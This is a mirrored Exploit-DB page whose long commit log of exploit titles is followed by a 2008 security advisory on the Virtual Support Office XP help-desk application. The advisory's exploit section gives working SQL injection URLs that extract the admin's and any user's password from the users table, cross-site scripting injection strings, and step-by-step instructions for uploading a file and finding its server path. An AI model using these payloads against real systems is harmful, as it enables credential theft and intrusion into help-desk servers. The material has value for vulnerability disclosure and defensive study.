bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/asp/webapps/5869.txt
Offensive Security f88827eb1f DB: 2016-12-10 
4 new exploits

Free MP3 CD Ripper 2.6 - Exploit (1)
Free MP3 CD Ripper 2.6 - '.wav' PoC

Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (1)
Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (1)
Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (2)
Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (3)
Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (2)
Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (3)

WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (1)
WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (PoC)
Ascend R 4.5 Ci12 - Denial of Service (1)
Ascend R 4.5 Ci12 - Denial of Service (2)
Ascend R 4.5 Ci12 - Denial of Service (C)
Ascend R 4.5 Ci12 - Denial of Service (Perl)

Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (1)
Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)

thttpd 2.2x - defang Remote Buffer Overflow (1)
thttpd 2.2x - defang Remote Buffer Overflow (PoC)

PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)
PHP 3/4/5 - Multiple Local / Remote Vulnerabilities (1)

Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC) (1)
Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC)

Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (3)
Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)

Free MP3 CD Ripper 2.6 - (wav) Stack Buffer Overflow (PoC)
Free MP3 CD Ripper 2.6 - '.wav' Stack Buffer Overflow

Free MP3 CD Ripper 2.6 - Exploit (2)
Free MP3 CD Ripper 2.6 - '.wav' Exploit

Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (2)
Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)

Free MP3 CD Ripper 2.6 - Local Buffer Overflow
Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow

Free MP3 CD Ripper 2.6 2.8 '.wav' - SEH Based Buffer Overflow (Windows 7 DEP Bypass)
Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow (Windows 7 DEP Bypass)

Alt-N SecurityGateway - 'Username' Buffer Overflow (Metasploit)
Alt-N SecurityGateway 1.0.1 - 'Username' Buffer Overflow (Metasploit)

WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (2)
WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow

thttpd 2.2x - defang Remote Buffer Overflow (2)
thttpd 2.2x - defang Remote Buffer Overflow

Windows x64 - Bind Shell TCP Shellcode (508 bytes)

CuteNews 1.4.1 - (function.php) Local File Inclusion
CuteNews 1.4.1 - 'function.php' Local File Inclusion

CoreNews 2.0.1 - (userid) SQL Injection
CoreNews 2.0.1 - 'userid' Parameter SQL Injection

phpAuction 2.1 - (phpAds_path) Remote File Inclusion
phpAuction 2.1 - 'phpAds_path' Parameter Remote File Inclusion

Freenews 1.1 - (moteur.php) Remote File Inclusion
Freenews 1.1 - 'moteur.php' Remote File Inclusion

SH-News 3.1 - (scriptpath) Multiple Remote File Inclusion
SH-News 3.1 - 'scriptpath' Parameter Remote File Inclusion

JaxUltraBB 2.0 - (delete.php) Remote Auto Deface Exploit
JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface Exploit

JaxUltraBB 2.0 - Topic Reply Command Execution
JaxUltraBB 2.0 - Command Execution

Oxygen 1.1.3 - (O2PHP Bulletin Board) SQL Injection
Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection

cutenews aj-fork 167f - (cutepath) Remote File Inclusion
cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion

SH-News 0.93 - (misc.php) Remote File Inclusion
SH-News 0.93 - 'misc.php' Remote File Inclusion

aspWebCalendar 4.5 - (calendar.asp eventid) SQL Injection
AspWebCalendar 4.5 - 'eventid' Parameter SQL Injection

SH-News 3.0 - (comments.php id) SQL Injection
SH-News 3.0 - 'comments.php' SQL Injection

ClipShare - 'uprofile.php UID' SQL Injection
ClipShare - 'UID' Parameter SQL Injection

Lasernet CMS 1.5 - SQL Injection (2)
LaserNet CMS 1.5 - SQL Injection (2)

Oxygen 2.0 - (repquote) SQL Injection
Oxygen 2.0 - 'repquote' Parameter SQL Injection

Open Azimyt CMS 0.22 - 'lang' Local File Inclusion
Open Azimyt CMS 0.22 - 'lang' Parameter Local File Inclusion

Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection
Joomla! Component Simple Shop Galore 3.x - 'catid' Parameter SQL Injection
Bizon-CMS 2.0 - (index.php Id) SQL Injection
Basic-CMS - 'index.php r' SQL Injection
Bizon-CMS 2.0 - 'Id' Parameter SQL Injection
Basic-CMS - 'index.php' SQL Injection
ClipShare < 3.0.1 - (tid) SQL Injection
easyTrade 2.x - (detail.php id) SQL Injection
ThaiQuickCart - (sLanguage) Local File Inclusion
ClipShare < 3.0.1 - 'tid' Parameter SQL Injection
easyTrade 2.x - 'id' Parameter SQL Injection
ThaiQuickCart 3 - 'sLanguage' Cookie Local File Inclusion
eroCMS 1.4 - (index.php site) SQL Injection
WebCalendar 1.0.4 - (includedir) Remote File Inclusion
traindepot 0.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
doITlive CMS 2.50 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
AspWebCalendar 2008 - Arbitrary File Upload
netBIOS - 'shownews.php newsid' SQL Injection
Maxtrade AIO 1.3.23 - (categori) SQL Injection
Mybizz-Classifieds - 'index.php cat' SQL Injection
Easy Webstore 1.2 - (index.php postid) SQL Injection
eroCMS 1.4 - 'site' Parameter SQL Injection
WebCalendar 1.0.4 - 'includedir' Parameter Remote File Inclusion
traindepot 0.1 - Local File Inclusion / Cross-Site Scripting
doITlive CMS 2.50 - SQL Injection / Cross-Site Scripting
AspWebCalendar 2008 - Arbitrary File Upload
netBIOS - 'newsid' Parameter SQL Injection
Maxtrade AIO 1.3.23 - 'categori' Parameter SQL Injection
Mybizz-Classifieds - 'cat' Parameter SQL Injection
Easy Webstore 1.2 - SQL Injection
Carscripts Classifieds - 'index.php cat' SQL Injection
BoatScripts Classifieds - 'index.php type' SQL Injection
Carscripts Classifieds - 'cat' Parameter SQL Injection
BoatScripts Classifieds - 'type' Parameter SQL Injection
ownrs blog beta3 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities
samart-cms 2.0 - (contentsid) SQL Injection
CMS-BRD - (menuclick) SQL Injection
ownrs blog beta3 - SQL Injection / Cross-Site Scripting
Yektaweb Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities
samart-cms 2.0 - 'contentsid' Parameter SQL Injection
CMS-BRD - 'menuclick' Parameter SQL Injection

CaupoShop Classic 1.3 - (saArticle[ID]) SQL Injection
CaupoShop Classic 1.3 - 'saArticle[ID]' SQL Injection

Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities

Lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities
Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities

CiBlog 3.1 - (links-extern.php id) SQL Injection
CiBlog 3.1 - 'id' Parameter SQL Injection
jaxultrabb 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
emuCMS 0.3 - 'cat_id' SQL Injection
phpAuction - 'profile.php user_id' SQL Injection
SiteXS CMS 0.1.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
@CMS 2.1.1 - (readarticle.php article_id) SQL Injection
eNews 0.1 - (delete.php) Arbitrary Delete Post
PHP KnowledgeBase Script 2.4 - 'cat_id' SQL Injection
jaxultrabb 2.0 - Local File Inclusion / Cross-Site Scripting
emuCMS 0.3 - 'cat_id' Parameter SQL Injection
phpAuction - 'profile.php' SQL Injection
SiteXS CMS 0.1.1 - Arbitrary File Upload / Cross-Site Scripting
@CMS 2.1.1 - SQL Injection
eNews 0.1 - 'delete.php' Arbitrary Delete Post
PHP KnowledgeBase Script 2.4 - 'cat_id' Parameter SQL Injection

OFFL 0.2.6 - (teams.php fflteam) SQL Injection
Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection
phpAuction 3.2.1 - (item.php id) SQL Injection
Joomla! Component EXP Shop - 'catid' SQL Injection
DUdForum 3.0 - (forum.asp iFor) SQL Injection
shibby shop 2.2 - (SQL Injection / update) Multiple Vulnerabilities
phpAuction 3.2.1 - 'item.php' SQL Injection
Joomla! Component EXP Shop - 'catid' Parameter SQL Injection
DUdForum 3.0 - 'iFor' Parameter SQL Injection
shibby shop 2.2 - Multiple Vulnerabilities

LiteNews 0.1 - 'id' SQL Injection
LiteNews 0.1 - 'id' Parameter SQL Injection

ClipShare Pro 2006-2007 - (chid) SQL Injection
ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection

phpauctionsystem - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
phpauctionsystem - Cross-Site Scripting / SQL Injection

Jamroom - 'index.php t' Local File Inclusion
Jamroom 4.0.2 - 't' Parameter Local File Inclusion

Oxygen2PHP 1.1.3 - (member.php) SQL Injection
Oxygen2PHP 1.1.3 - 'member.php' SQL Injection
Oxygen2PHP 1.1.3 - (post.php) Blind SQL Injection
Oxygen2PHP 1.1.3 - (forumdisplay.php) Blind SQL Injection
Oxygen2PHP 1.1.3 - 'post.php' Blind SQL Injection
Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection

MyPhpAuction 2010 - 'id' SQL Injection
MyPhpAuction 2010 - 'id' Parameter SQL Injection

CuteNews - 'index.php?page' Local File Inclusion
CuteNews - 'page' Parameter Local File Inclusion

Lasernet CMS 1.5 - SQL Injection (1)
LaserNet CMS 1.5 - SQL Injection (1)

WebCalendar 1.2.4 - (install/index.php) Remote Code Execution
WebCalendar 1.2.4 - Remote Code Execution

MyMarket 1.71 - Form_Header.php Cross-Site Scripting
MyMarket 1.71 - 'Form_Header.php' Cross-Site Scripting
CuteNews 0.88 - shownews.php Remote File Inclusion
CuteNews 0.88 - search.php Remote File Inclusion
CuteNews 0.88 - comments.php Remote File Inclusion
CuteNews 0.88 - 'shownews.php' Remote File Inclusion
CuteNews 0.88 - 'search.php' Remote File Inclusion
CuteNews 0.88 - 'comments.php' Remote File Inclusion
WebCalendar 0.9.x - colors.php color Cross-Site Scripting
WebCalendar 0.9.x - week.php user Cross-Site Scripting
CuteNews 0.88/1.3 - example1.php id Parameter Cross-Site Scripting
CuteNews 0.88/1.3 - example2.php id Parameter Cross-Site Scripting
CuteNews 0.88/1.3 - show_archives.php id Parameter Cross-Site Scripting
CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting
CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting
CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting

CuteNews 1.3.1 - show_archives.php archive Parameter Cross-Site Scripting
CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting

ClipShare 4.1.1 - (gmembers.php gid Parameter) Blind SQL Injection
ClipShare 4.1.1 - 'gid' Parameter Blind SQL Injection

CutePHP CuteNews 1.3.6 - x-forwarded-for Script Injection
CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection
CuteNews 1.4.1 - show_archives.php template Parameter Traversal Arbitrary File Access
CuteNews 1.4.1 - show_news.php template Parameter Traversal Arbitrary File Access
CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access
CuteNews 1.4.1 - 'template' Parameter Traversal Arbitrary File Access

WebCalendar 1.0.1 - Layers_Toggle.php HTTP Response Splitting
WebCalendar 1.0.1 - 'Layers_Toggle.php' HTTP Response Splitting

CuteNews 1.4.1 - show_news.php Cross-Site Scripting
CuteNews 1.4.1 - 'show_news.php' Cross-Site Scripting

O2PHP Oxygen 1.0/1.1 - post.php SQL Injection
O2PHP Oxygen 1.0/1.1 - 'post.php' SQL Injection

Freenews 1.1 - Aff_News.php Remote File Inclusion
Freenews 1.1 - 'Aff_News.php' Remote File Inclusion

ActiveNews Manager - activenews_view.asp articleId Parameter SQL Injection
ActiveNews Manager - 'articleId' Parameter SQL Injection
ActiveNews Manager - default.asp page Parameter SQL Injection
ActiveNews Manager - activenews_search.asp query Parameter Cross-Site Scripting
Active News Manager - activeNews_categories.asp catID Parameter SQL Injection
Active News Manager - activeNews_comments.asp articleId Parameter SQL Injection
ActiveNews Manager - 'page' Parameter SQL Injection
ActiveNews Manager - 'query' Parameter Cross-Site Scripting
Active News Manager - 'catID' Parameter SQL Injection
Active News Manager - 'articleId' Parameter SQL Injection
CuteNews 1.4.5 - show_news.php Query String Cross-Site Scripting
CuteNews 1.4.5 - rss.php rss_title Parameter Cross-Site Scripting
CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting
CuteNews 1.4.5 - 'rss_title' Parameter Cross-Site Scripting

CuteNews 1.3.6 - Result Parameter Cross-Site Scripting
CuteNews 1.3.6 - 'result' Parameter Cross-Site Scripting

ClipShare 1.5.3 - ADODB-Connection.Inc.php Remote File Inclusion
ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion
WebCalendar 1.1.6 - pref.php Query String Cross-Site Scripting
WebCalendar 1.1.6 - search.php adv Parameter Cross-Site Scripting
WebCalendar 1.1.6 - 'pref.php' Cross-Site Scripting
WebCalendar 1.1.6 - 'search.php' Cross-Site Scripting

SiteXS CMS 0.0.1 - 'upload.php' Arbitrary File Upload
SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload

Basic-CMS - 'index.php' SQL Injection

Joomla! Component EXP Shop 1.0 'com_expshop' - SQL Injection
Joomla! Component EXP Shop 1.0 - SQL Injection

Jamroom 3.3.8 - (Cookie Authentication Bypass and Unspecified Security Issues) Multiple Vulnerabilities
Jamroom 3.3.8 - Cookie Authentication Bypass

CuteNews 1.4.6 - register.php result Parameter Cross-Site Scripting
CuteNews 1.4.6 - 'result' Parameter Cross-Site Scripting

CuteNews 1.4.6 - search.php from_date_day Parameter Full Path Disclosure
CuteNews 1.4.6 - 'from_date_day' Parameter Full Path Disclosure

ZeroCMS 1.0 - (zero_view_article.php article_id Parameter) SQL Injection
ZeroCMS 1.0 - 'zero_view_article.php' SQL Injection

ZeroCMS 1.0 - zero_transact_user.php Handling Privilege Escalation
ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation

ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection
ZeroCMS 1.0 - 'zero_transact_article.php' SQL Injection

WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (1)

WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (2)

Netgear R7000 - Command Injection
2016-12-10 05:01:16 +00:00

106 lines
6 KiB
Text
Executable file
Raw Blame History

########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: Virtual Support Office-XP Multiple Vulnerabilities.
# Vendor: www.vso-xp.com
# Vulnerable Version: 3.0.29, 3.0.27 and prior versions
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: www.bugreport.ir/?/47
###################################################################################
####################
1. Description:
####################
Virtual Support Office XP is Web Based Help Desk Software Solution which allows you to forge strong
relationships and increase customer satisfaction, while dramatically streamlining support operations.
With the VSO-XP application, customer service and support professionals have the tools they need to
surpass the most ambitious quality-of-service or productivity goals you establish.
####################
2. Vulnerabilities:
####################
2.1. Broken Authentication and Session Management. An attacker can have access to classified information. And see some of admin pages. such as:
"/admin/Companies.asp", "/admin/customfeild.asp" and "admin/EmailAccountsUpd.asp". The Last one is particularly important for she Change the Servers Name and Mail Box and Servers Port.
2.2. Broken Authentication.An attacker can register (sign up) users at "/signup.asp" without any kind of supervision or disclosureing any kind of information-even submitting a true email address is not necessary-she can obtain her password by injection-see.
2.3. Broken Authentication and Session Management. An attacker can make an admin user at "/admin/addressnew.asp".
2.4. Injection Flaws. SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter. By using it an attacker can obtain the password of any user she wishes-including admin's. She can also get other information such as version of the database and...
2.4.1. Exploit:
Check the exploit section.
2.5. Injection Flaws. SQL Injection in "/getpassword.asp" in"userID" parameter. By using it an attacker can obtain the password of any user she wishes.
2.5.1. Exploit:
Check the exploit section.
2.6. Injection Flaws. SQL Injection in "/admin/accountupd.asp" in "keyid" parameter.Classified information can be obtained.
2.6.1. POC:
https://url/admin/accountupd.asp?keyid=1%20having%201=1
2.7. Injection Flaws. SQL Injection in "/admin/clientupdreg.asp" in "Client_ID" parameter.
2.7.1. POC:
https://url/admin/clientupdreg.asp?Client_ID=1%20having%201=1
2.8. Injection Flaws. SQL Injection in "/admin/EmailAccountsUpd_process.asp" in "KeyID" parameter.
2.8.1. POC:
https://url/admin/EmailAccountsUpd_process.asp?KeyID=1 order by 2
2.9. Cross Site Scripting. There is a XSS in "/cases/case_search.asp" in search field.
2.9.1. POC:
Insert "><script>alert("mach BugReport.IR XSS");</script>
2.10. Cross Site Scripting. There is a XSS in "/url/kb/kb_home.asp" in Search Field.
2.10.1. POC:
Insert "><script>alert("mach BugReport.IR XSS");</script>
2.11 Cross Site Scripting. There is a XSS in "/downloads/search_folders.asp" in Search Fields.
2.11.1. POC:
Insert "><script>alert("mach BugReport.IR XSS");</script>
2.12. Cross Site Scripting. There is a XSS in "/reports/MyIssuesReport.asp?id=336" in Report Title and Subject fields.
2.12.1. POC:
Insert "><script>alert("mach BugReport.IR XSS");</script>
2.13. volunerable to file uploading and finding the phisical path to the file.
2.13.1. Exploit:
Check the exploit section.
2.14. Path disclosure.
2.14.1 POC
https://url/admin/accountnew2.asp
####################
3. Exploits:
####################
Original Exploit URL: http://bugreport.ir/index.php?/47/exploit
Note1: Use Internet Explorer (IE) for best result.
3.4.1 SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter.
-------------
Obtain admin's password:
https://[URL]/admin/CustomFields.asp?Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users%20where%20USERID=%20'admin'--
-------------
Get other information such as version of the database and...:
https://[URL]/admin/CustomFields.asp?Group_ID=1union%20select%20@@version,1,1,1,1,1--
-------------
3.5.1 SQL Injection in "/admin/getpassword.asp" in "userID" parameter.
Insert the following Code in burpproxy, in userID field, change ANYUSERID to your choice of userID and get the password!
-------------
obtain the password of any user she wishes:
m%27%20or%201%20in%20%28select%20PASSWORD%20from%20users%20where%20USERID%3D%27ANYUSERID%27%29--
-------------
3.13.1 Scenario for file uploading and finding the physical path to the file.
-------------
Step1: Find the id of an existing folder easily at "/downloads/folders_root.asp?vsoxp_select=0"
Step2: Go to "/downloads/createfile.asp?id=VALIDFOLDERID" and upload your file.
Step3: Go back to step 1 and find your file?s ID.
Step4: Go to "/downloads/openlink.asp?id=YOURFILEID" and see the physical address of your file at server!
-------------
####################
4. Solution:
####################
Edit the source code to ensure that inputs are properly sanitized for XSSes and Injections, and wait for vendor patch.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Web security is our art.
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
# milw0rm.com [2008-06-20]
Reference in a new issue View git blame Copy permalink